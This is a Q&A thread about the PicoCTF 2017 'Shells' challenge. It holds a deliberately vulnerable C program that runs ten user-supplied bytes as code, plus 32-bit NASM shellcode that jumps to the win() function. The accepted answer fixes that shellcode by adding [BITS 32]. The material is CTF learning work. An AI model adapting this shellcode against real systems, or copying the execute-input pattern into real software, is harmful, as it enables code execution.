# Shells CTF segfault - wrong address

Tags: disassembly, assembly, binary-analysis, compilers, gcc

PicoCTF 2017 Shells
I have a binary and source:

```
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/mman.h>

#define AMOUNT_OF_STUFF 10

//TODO: Ask IT why this is here
void win(){
    system("/bin/cat ./flag.txt");    
}


void vuln(){
    char * stuff = (char *)mmap(NULL, AMOUNT_OF_STUFF, PROT_EXEC|PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
    if(stuff == MAP_FAILED){
        printf("Failed to get space. Please talk to admin\n");
        exit(0);
    }
    printf("Give me %d bytes:\n", AMOUNT_OF_STUFF);
    fflush(stdout);
    int len = read(STDIN_FILENO, stuff, AMOUNT_OF_STUFF);
    if(len == 0){
        printf("You didn't give me anything :(");
        exit(0);
    }

    void (*func)() = (void (*)())stuff;
    func();      
}

int main(int argc, char*argv[]){
    printf("My mother told me to never accept things from strangers\n");
    printf("How bad could running a couple bytes be though?\n");
    fflush(stdout);
    vuln();
    return 0;
}
```

The goal is to call win() function.

So: 
gdb ./shells
I have address of win function: 0x08048540
then i create shellcode:

```
section .text
    global _start
_start:
    mov eax,0x08048540
    jmp eax

section .data
```

after compile an use sehllcode i have the flag.
But when i compile source code instead of using given binary:

```
gcc -m32 -fno-stack-protector -z execstack shells.c -o shells2
```

This not works anymore, segfault all the time.
Why with binary file my method works and with compiled source manually not working?
PS. Flag is in the right place.

Comment: address of `win` changes after you recompile?

Comment: Yes address changes, after i recompile it is 0x0000065d but if i use this address i have segfault.

Comment: well `0x0000065d` can ba only a part of the address. The full one would be `0x804865d` I guess

Comment: but why gdb or objdump shows in orignal binary address 0x08048540 but in binary compiled by me 0x0000065d and first works and second not?

Answer (score 2, accepted):

I think your shellcode is missing the specifier for the bit-ness of the shellcode. You're compiling the `shells` in 32 bits, but for the `nasm` (I'm assuming you're using that) doesn't have anything. I'm assuming you're compiling in `bin` mode and if you check the [documentation](http://www.nasm.us/doc/nasmdoc6.html)

> ...the bin output format defaults to 16-bit mode in anticipation of it being used most frequently to write DOS .COM programs, DOS .SYS device drivers and boot loader software.

So what you need to do is:

```
[BITS 32]
section .text
    global _start
_start:
    mov eax,0x08048540 ; need to put correct address here of course
    jmp eax

section .data
```

..compile & voilà

[image]